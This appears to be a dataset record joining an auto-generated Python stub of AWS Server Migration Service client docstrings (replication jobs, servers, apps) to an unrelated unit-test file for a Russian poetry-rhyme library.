- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMI or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **replicationRunList** *(list) --*
Information about the replication runs.
- *(dict) --*
Represents a replication run.
- **replicationRunId** *(string) --*
The identifier of the replication run.
- **state** *(string) --*
The state of the replication run.
- **type** *(string) --*
The type of replication run.
- **stageDetails** *(dict) --*
Details of the current stage of the replication run.
- **stage** *(string) --*
String describing the current stage of a replication run.
- **stageProgress** *(string) --*
String describing the progress of the current stage of a replication run.
- **statusMessage** *(string) --*
The description of the current status of the replication job.
- **amiId** *(string) --*
The identifier of the Amazon Machine Image (AMI) from the replication run.
- **scheduledStartTime** *(datetime) --*
The start time of the next replication run.
- **completedTime** *(datetime) --*
The completion time of the last replication run.
- **description** *(string) --*
The description of the replication run.
- **encrypted** *(boolean) --*
Whether the replication run should produce encrypted AMI or not. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer's default KMS key for EBS is used.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
"""
pass
def get_servers(self, nextToken: str = None, maxResults: int = None, vmServerAddressList: List = None) -> Dict:
"""
Describes the servers in your server catalog.
Before you can describe your servers, you must import them using ImportServerCatalog .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/GetServers>`_
**Request Syntax**
::
response = client.get_servers(
nextToken='string',
maxResults=123,
vmServerAddressList=[
{
'vmManagerId': 'string',
'vmId': 'string'
},
]
)
**Response Syntax**
::
{
'lastModifiedOn': datetime(2015, 1, 1),
'serverCatalogStatus': 'NOT_IMPORTED'|'IMPORTING'|'AVAILABLE'|'DELETED'|'EXPIRED',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **lastModifiedOn** *(datetime) --*
The time when the server was last modified.
- **serverCatalogStatus** *(string) --*
The status of the server catalog.
- **serverList** *(list) --*
Information about the servers.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:type vmServerAddressList: list
:param vmServerAddressList:
List of ``VmServerAddress`` objects
- *(dict) --*
Represents a VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
:rtype: dict
:returns:
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_server_catalog(self) -> Dict:
"""
Gathers a complete list of on-premises servers. Connectors must be installed and monitoring all servers that you want to import.
This call returns immediately, but might take additional time to retrieve all the servers.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/ImportServerCatalog>`_
**Request Syntax**
::
response = client.import_server_catalog()
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:rtype: dict
:returns:
"""
pass
def launch_app(self, appId: str = None) -> Dict:
"""
Launches an application stack.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/LaunchApp>`_
**Request Syntax**
::
response = client.launch_app(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to launch.
:rtype: dict
:returns:
"""
pass
def list_apps(self, appIds: List = None, nextToken: str = None, maxResults: int = None) -> Dict:
"""
Returns a list of summaries for all applications.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/ListApps>`_
**Request Syntax**
::
response = client.list_apps(
appIds=[
'string',
],
nextToken='string',
maxResults=123
)
**Response Syntax**
::
{
'apps': [
{
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **apps** *(list) --*
A list of application summaries.
- *(dict) --*
Information about the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's creation.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **nextToken** *(string) --*
The token required to retrieve the next set of results. This value is null when there are no more results to return.
:type appIds: list
:param appIds:
- *(string) --*
:type nextToken: string
:param nextToken:
The token for the next set of results.
:type maxResults: integer
:param maxResults:
The maximum number of results to return in a single call. The default value is 50. To retrieve the remaining results, make another call with the returned ``NextToken`` value.
:rtype: dict
:returns:
"""
pass
def put_app_launch_configuration(self, appId: str = None, roleName: str = None, serverGroupLaunchConfigurations: List = None) -> Dict:
"""
Creates a launch configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/PutAppLaunchConfiguration>`_
**Request Syntax**
::
response = client.put_app_launch_configuration(
appId='string',
roleName='string',
serverGroupLaunchConfigurations=[
{
'serverGroupId': 'string',
'launchOrder': 123,
'serverLaunchConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'logicalId': 'string',
'vpc': 'string',
'subnet': 'string',
'securityGroup': 'string',
'ec2KeyName': 'string',
'userData': {
's3Location': {
'bucket': 'string',
'key': 'string'
}
},
'instanceType': 'string',
'associatePublicIpAddress': True|False
},
]
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application associated with the launch configuration.
:type roleName: string
:param roleName:
Name of service role in the customer\'s account that Amazon CloudFormation uses to launch the application.
:type serverGroupLaunchConfigurations: list
:param serverGroupLaunchConfigurations:
Launch configurations for server groups in the application.
- *(dict) --*
Launch configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group the launch configuration is associated with.
- **launchOrder** *(integer) --*
Launch order of servers in the server group.
- **serverLaunchConfigurations** *(list) --*
Launch configuration for servers in the server group.
- *(dict) --*
Launch configuration for a server.
- **server** *(dict) --*
Identifier of the server the launch configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **logicalId** *(string) --*
Logical ID of the server in the Amazon CloudFormation template.
- **vpc** *(string) --*
Identifier of the VPC the server should be launched into.
- **subnet** *(string) --*
Identifier of the subnet the server should be launched into.
- **securityGroup** *(string) --*
Identifier of the security group that applies to the launched server.
- **ec2KeyName** *(string) --*
Name of the EC2 SSH Key to be used for connecting to the launched server.
- **userData** *(dict) --*
Location of the user-data script to be executed when launching the server.
- **s3Location** *(dict) --*
Amazon S3 location of the user-data script.
- **bucket** *(string) --*
Amazon S3 bucket name.
- **key** *(string) --*
Amazon S3 bucket key.
- **instanceType** *(string) --*
Instance type to be used for launching the server.
- **associatePublicIpAddress** *(boolean) --*
If true, a publicly accessible IP address is created when launching the server.
:rtype: dict
:returns:
"""
pass
def put_app_replication_configuration(self, appId: str = None, serverGroupReplicationConfigurations: List = None) -> Dict:
"""
Creates or updates a replication configuration for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/PutAppReplicationConfiguration>`_
**Request Syntax**
::
response = client.put_app_replication_configuration(
appId='string',
serverGroupReplicationConfigurations=[
{
'serverGroupId': 'string',
'serverReplicationConfigurations': [
{
'server': {
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
'serverReplicationParameters': {
'seedTime': datetime(2015, 1, 1),
'frequency': 123,
'runOnce': True|False,
'licenseType': 'AWS'|'BYOL',
'numberOfRecentAmisToKeep': 123,
'encrypted': True|False,
'kmsKeyId': 'string'
}
},
]
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application tassociated with the replication configuration.
:type serverGroupReplicationConfigurations: list
:param serverGroupReplicationConfigurations:
Replication configurations for server groups in the application.
- *(dict) --*
Replication configuration for a server group.
- **serverGroupId** *(string) --*
Identifier of the server group this replication configuration is associated with.
- **serverReplicationConfigurations** *(list) --*
Replication configuration for servers in the server group.
- *(dict) --*
Replication configuration of a server.
- **server** *(dict) --*
Identifier of the server this replication configuration is associated with.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **serverReplicationParameters** *(dict) --*
Parameters for replicating the server.
- **seedTime** *(datetime) --*
Seed time for creating a replication job for the server.
- **frequency** *(integer) --*
Frequency of creating replication jobs for the server.
- **runOnce** *(boolean) --*
- **licenseType** *(string) --*
License type for creating a replication job for the server.
- **numberOfRecentAmisToKeep** *(integer) --*
Number of recent AMIs to keep when creating a replication job for this server.
- **encrypted** *(boolean) --*
When true, the replication job produces encrypted AMIs. See also ``KmsKeyId`` below.
- **kmsKeyId** *(string) --*
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
"""
pass
def start_app_replication(self, appId: str = None) -> Dict:
"""
Starts replicating an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StartAppReplication>`_
**Request Syntax**
::
response = client.start_app_replication(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to replicate.
:rtype: dict
:returns:
"""
pass
def start_on_demand_replication_run(self, replicationJobId: str, description: str = None) -> Dict:
"""
Starts an on-demand replication run for the specified replication job. This replication run starts immediately. This replication run is in addition to the ones already scheduled.
There is a limit on the number of on-demand replications runs you can request in a 24-hour period.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StartOnDemandReplicationRun>`_
**Request Syntax**
::
response = client.start_on_demand_replication_run(
replicationJobId='string',
description='string'
)
**Response Syntax**
::
{
'replicationRunId': 'string'
}
**Response Structure**
- *(dict) --*
- **replicationRunId** *(string) --*
The identifier of the replication run.
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type description: string
:param description:
The description of the replication run.
:rtype: dict
:returns:
"""
pass
def stop_app_replication(self, appId: str = None) -> Dict:
"""
Stops replicating an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/StopAppReplication>`_
**Request Syntax**
::
response = client.stop_app_replication(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to stop replicating.
:rtype: dict
:returns:
"""
pass
def terminate_app(self, appId: str = None) -> Dict:
"""
Terminates the stack for an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/TerminateApp>`_
**Request Syntax**
::
response = client.terminate_app(
appId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type appId: string
:param appId:
ID of the application to terminate.
:rtype: dict
:returns:
"""
pass
def update_app(self, appId: str = None, name: str = None, description: str = None, roleName: str = None, serverGroups: List = None, tags: List = None) -> Dict:
"""
Updates an application.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/UpdateApp>`_
**Request Syntax**
::
response = client.update_app(
appId='string',
name='string',
description='string',
roleName='string',
serverGroups=[
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
tags=[
{
'key': 'string',
'value': 'string'
},
]
)
**Response Syntax**
::
{
'appSummary': {
'appId': 'string',
'name': 'string',
'description': 'string',
'status': 'CREATING'|'ACTIVE'|'UPDATING'|'DELETING'|'DELETED'|'DELETE_FAILED',
'statusMessage': 'string',
'replicationStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_REPLICATION'|'VALIDATION_IN_PROGRESS'|'REPLICATION_PENDING'|'REPLICATION_IN_PROGRESS'|'REPLICATED'|'DELTA_REPLICATION_IN_PROGRESS'|'DELTA_REPLICATED'|'DELTA_REPLICATION_FAILED'|'REPLICATION_FAILED'|'REPLICATION_STOPPING'|'REPLICATION_STOP_FAILED'|'REPLICATION_STOPPED',
'replicationStatusMessage': 'string',
'latestReplicationTime': datetime(2015, 1, 1),
'launchStatus': 'READY_FOR_CONFIGURATION'|'CONFIGURATION_IN_PROGRESS'|'CONFIGURATION_INVALID'|'READY_FOR_LAUNCH'|'VALIDATION_IN_PROGRESS'|'LAUNCH_PENDING'|'LAUNCH_IN_PROGRESS'|'LAUNCHED'|'DELTA_LAUNCH_IN_PROGRESS'|'DELTA_LAUNCH_FAILED'|'LAUNCH_FAILED'|'TERMINATE_IN_PROGRESS'|'TERMINATE_FAILED'|'TERMINATED',
'launchStatusMessage': 'string',
'launchDetails': {
'latestLaunchTime': datetime(2015, 1, 1),
'stackName': 'string',
'stackId': 'string'
},
'creationTime': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'roleName': 'string',
'totalServerGroups': 123,
'totalServers': 123
},
'serverGroups': [
{
'serverGroupId': 'string',
'name': 'string',
'serverList': [
{
'serverId': 'string',
'serverType': 'VIRTUAL_MACHINE',
'vmServer': {
'vmServerAddress': {
'vmManagerId': 'string',
'vmId': 'string'
},
'vmName': 'string',
'vmManagerName': 'string',
'vmManagerType': 'VSPHERE'|'SCVMM'|'HYPERV-MANAGER',
'vmPath': 'string'
},
'replicationJobId': 'string',
'replicationJobTerminated': True|False
},
]
},
],
'tags': [
{
'key': 'string',
'value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **appSummary** *(dict) --*
Summary description of the application.
- **appId** *(string) --*
Unique ID of the application.
- **name** *(string) --*
Name of the application.
- **description** *(string) --*
Description of the application.
- **status** *(string) --*
Status of the application.
- **statusMessage** *(string) --*
A message related to the status of the application
- **replicationStatus** *(string) --*
Replication status of the application.
- **replicationStatusMessage** *(string) --*
A message related to the replication status of the application.
- **latestReplicationTime** *(datetime) --*
Timestamp of the application's most recent successful replication.
- **launchStatus** *(string) --*
Launch status of the application.
- **launchStatusMessage** *(string) --*
A message related to the launch status of the application.
- **launchDetails** *(dict) --*
Details about the latest launch of the application.
- **latestLaunchTime** *(datetime) --*
Latest time this application was launched successfully.
- **stackName** *(string) --*
Name of the latest stack launched for this application.
- **stackId** *(string) --*
Identifier of the latest stack launched for this application.
- **creationTime** *(datetime) --*
Time of creation of this application.
- **lastModified** *(datetime) --*
Timestamp of the application's creation.
- **roleName** *(string) --*
Name of the service role in the customer's account used by AWS SMS.
- **totalServerGroups** *(integer) --*
Number of server groups present in the application.
- **totalServers** *(integer) --*
Number of servers present in the application.
- **serverGroups** *(list) --*
List of updated server groups in the application.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
- **tags** *(list) --*
List of tags associated with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:type appId: string
:param appId:
ID of the application to update.
:type name: string
:param name:
New name of the application.
:type description: string
:param description:
New description of the application.
:type roleName: string
:param roleName:
Name of the service role in the customer\'s account used by AWS SMS.
:type serverGroups: list
:param serverGroups:
List of server groups in the application to update.
- *(dict) --*
A logical grouping of servers.
- **serverGroupId** *(string) --*
Identifier of a server group.
- **name** *(string) --*
Name of a server group.
- **serverList** *(list) --*
List of servers belonging to a server group.
- *(dict) --*
Represents a server.
- **serverId** *(string) --*
The identifier of the server.
- **serverType** *(string) --*
The type of server.
- **vmServer** *(dict) --*
Information about the VM server.
- **vmServerAddress** *(dict) --*
Information about the VM server location.
- **vmManagerId** *(string) --*
The identifier of the VM manager.
- **vmId** *(string) --*
The identifier of the VM.
- **vmName** *(string) --*
The name of the VM.
- **vmManagerName** *(string) --*
The name of the VM manager.
- **vmManagerType** *(string) --*
The type of VM management product.
- **vmPath** *(string) --*
The VM folder path in the vCenter Server virtual machine inventory tree.
- **replicationJobId** *(string) --*
The identifier of the replication job.
- **replicationJobTerminated** *(boolean) --*
Indicates whether the replication job is deleted or failed.
:type tags: list
:param tags:
List of tags to associate with the application.
- *(dict) --*
A label that can be assigned to an application.
- **key** *(string) --*
Tag key.
- **value** *(string) --*
Tag value.
:rtype: dict
:returns:
"""
pass
def update_replication_job(self, replicationJobId: str, frequency: int = None, nextReplicationRunStartTime: datetime = None, licenseType: str = None, roleName: str = None, description: str = None, numberOfRecentAmisToKeep: int = None, encrypted: bool = None, kmsKeyId: str = None) -> Dict:
"""
Updates the specified settings for the specified replication job.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/sms-2016-10-24/UpdateReplicationJob>`_
**Request Syntax**
::
response = client.update_replication_job(
replicationJobId='string',
frequency=123,
nextReplicationRunStartTime=datetime(2015, 1, 1),
licenseType='AWS'|'BYOL',
roleName='string',
description='string',
numberOfRecentAmisToKeep=123,
encrypted=True|False,
kmsKeyId='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type replicationJobId: string
:param replicationJobId: **[REQUIRED]**
The identifier of the replication job.
:type frequency: integer
:param frequency:
The time between consecutive replication runs, in hours.
:type nextReplicationRunStartTime: datetime
:param nextReplicationRunStartTime:
The start time of the next replication run.
:type licenseType: string
:param licenseType:
The license type to be used for the AMI created by a successful replication run.
:type roleName: string
:param roleName:
The name of the IAM role to be used by AWS SMS.
:type description: string
:param description:
The description of the replication job.
:type numberOfRecentAmisToKeep: integer
:param numberOfRecentAmisToKeep:
The maximum number of SMS-created AMIs to retain. The oldest will be deleted once the maximum number is reached and a new AMI is created.
:type encrypted: boolean
:param encrypted:
When true, the replication job produces encrypted AMIs . See also ``KmsKeyId`` below.
:type kmsKeyId: string
:param kmsKeyId:
KMS key ID for replication jobs that produce encrypted AMIs. Can be any of the following:
* KMS key ID
* KMS key alias
* ARN referring to KMS key ID
* ARN referring to KMS key alias
If encrypted is *true* but a KMS key id is not specified, the customer\'s default KMS key for EBS is used.
:rtype: dict
:returns:
"""
pass
| 46.799918 | 403 | 0.468899 | 9,024 | 113,677 | 5.86691 | 0.057735 | 0.024932 | 0.024083 | 0.022439 | 0.859132 | 0.837958 | 0.820354 | 0.807038 | 0.795044 | 0.785203 | 0 | 0.008418 | 0.431512 | 113,677 | 2,428 | 404 | 46.819193 | 0.810829 | 0.799229 | 0 | 0.438356 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.438356 | false | 0.438356 | 0.123288 | 0 | 0.575342 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
afe83ae51facb95287c36d5db5fa532c2c0f177d | 11,828 | py | Python | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | 1 | 2020-12-01T22:51:03.000Z | 2020-12-01T22:51:03.000Z | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | null | null | null | poetrytools/tests/test_ru_poetics.py | standfromunder/Poetry-Tools | fa81b677be41b542e2288f39a1d3cc5d2b761922 | [
"MIT"
] | 1 | 2021-03-04T17:36:32.000Z | 2021-03-04T17:36:32.000Z | import os
import unittest
from poetrytools.PoetryRU import PoetryRU
class TestENPoems(unittest.TestCase):
def setUp(self):
self.poetryRUS = PoetryRU('cmudict/ru_cmudict.json')
self.number = 0
def open_poem(self, poem):
with open(os.path.join('..','poems', 'ru', poem), encoding='utf-8') as f:
return self.poetryRUS.tokenize(f.read())
def open_test(self, test):
with open(os.path.join('..', 'poems', 'test_files', test), encoding='utf-8') as f:
return self.poetryRUS.tokenize(f.read())
def test_easy_rhyme(self):
easy_test = self.open_test('easy_tests.txt')
for pair in easy_test:
print(pair[0], pair[1])
self.assertTrue(self.poetryRUS.rhymes(pair[0], pair[1]))
def test_rhyme(self):
self.assertTrue(self.poetryRUS.rhymes('раскис', 'вниз'))
def test_rhyme_scheme(self):
poem = """В прозрачных пространствах Эфира,
Над сумраком дольнего мира,
Над шумом забытой метели,
Два светлые духа летели."""
tokenized_poem = self.poetryRUS.tokenize(poem)
rhyme_scheme = self.poetryRUS.guess_rhyme_type(tokenized_poem)
print('Rhyme scheme: {}'.format(rhyme_scheme))
def test_hard_rhyme(self):
hard_test = self.open_test('hard_tests.txt')
for pair in hard_test:
print(pair[0], pair[1])
self.assertTrue(self.poetryRUS.rhymes(pair[0], pair[1]))
def test_poem_1(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aa')
def test_poem_2(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaaa')
def test_poem_3(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaabaaabbbabbcdcdb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaabaaabbbabbcdcdb')
def test_poem_4(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabb')
def test_poem_5(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbcc.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbcc')
def test_poem_6(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbccaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
